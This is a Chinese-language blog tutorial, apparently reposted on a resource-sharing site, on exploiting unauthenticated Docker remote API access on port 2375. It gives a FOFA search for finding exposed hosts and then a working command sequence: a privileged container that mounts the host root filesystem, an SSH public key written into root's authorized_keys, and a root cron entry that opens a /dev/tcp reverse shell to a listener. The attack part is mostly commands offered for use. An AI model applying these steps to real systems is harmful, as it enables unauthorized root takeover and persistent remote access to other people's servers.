Docker API 未授权访问漏洞问题解析

本站所有内容来自互联网收集,仅供学习和交流,请勿用于商业用途。如有侵权、不妥之处,请第一时间联系我们删除!Q群:迪思分享

免费资源网 – https://freexyz.cn/
目录docker api未授权访问漏洞00×1 漏洞成因00×2 信息收集00×3 漏洞利用ssh连接写计划任务

因为docker赋有远程的远程控制,docker开放了一个tcp端口2375,如果没有限制访问的话,攻击者就会通过这个端口来通过docker未授权来获取服务器权限。

docker api未授权访问漏洞

00×1 漏洞成因

因为docker赋有远程的远程控制,docker开放了一个tcp端口2375,如果没有限制访问的话,攻击者就会通过这个端口来通过docker未授权来获取服务器权限。

00×2 信息收集

FOFA中搜索port = 2375 && status_code = “404”

访问站点2375端口,显示

Docker API 未授权访问漏洞问题解析插图

访问/info目录,查看版本信息

Docker API 未授权访问漏洞问题解析插图1

证明改站点存在docker未授权访问漏洞

00×3 漏洞利用

docker -H tcp://ip ps -a 查看容器 dokcer -H tcp:// images 查看镜像

为了获取宿主机的权限,我们需要把宿主机的根目录挂载到docker容器中

docker -H tcp://ip run -it –privileged=true -v /:/mnt –entrypoint /bin/bash image-id

–privileged=true:使用该参数,container内的root拥有真正的root权限。

-v /:/mnt:将宿主机的根目录挂载到/mnt目录下

–entrypoint /bin/bash:指定镜像的默认入口命令,该入口命令会在启动容器时作为根命令执行,所有其他传入值作为该命令的参数,用法ENTRYPOINT command param1 param2

Docker API 未授权访问漏洞问题解析插图2

现在就拿到了root权限,利用方式有很多种

ssh连接 ssh-keygen -t rsa //生成一个ssh公钥 cat /root/.ssh/id_rsa.pub //查看生成的公钥 echo “公钥内容” > /mnt/root/.ssh/authorized_keys //写公钥 ssh root@目标ip -i id_rsa //ssh进行连接 写计划任务 nc -lvvp port //开启监听 echo “* * * * * /bin/bash -i >& /dev/tcp/ip/port 0>&1” > /mnt/var/spool/cron/root ///反弹shell
免费资源网 – https://freexyz.cn/


© 版权声明
THE END
★喜欢这篇文章吗?喜欢的话,麻烦动动手指支持一下!★
点赞6 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容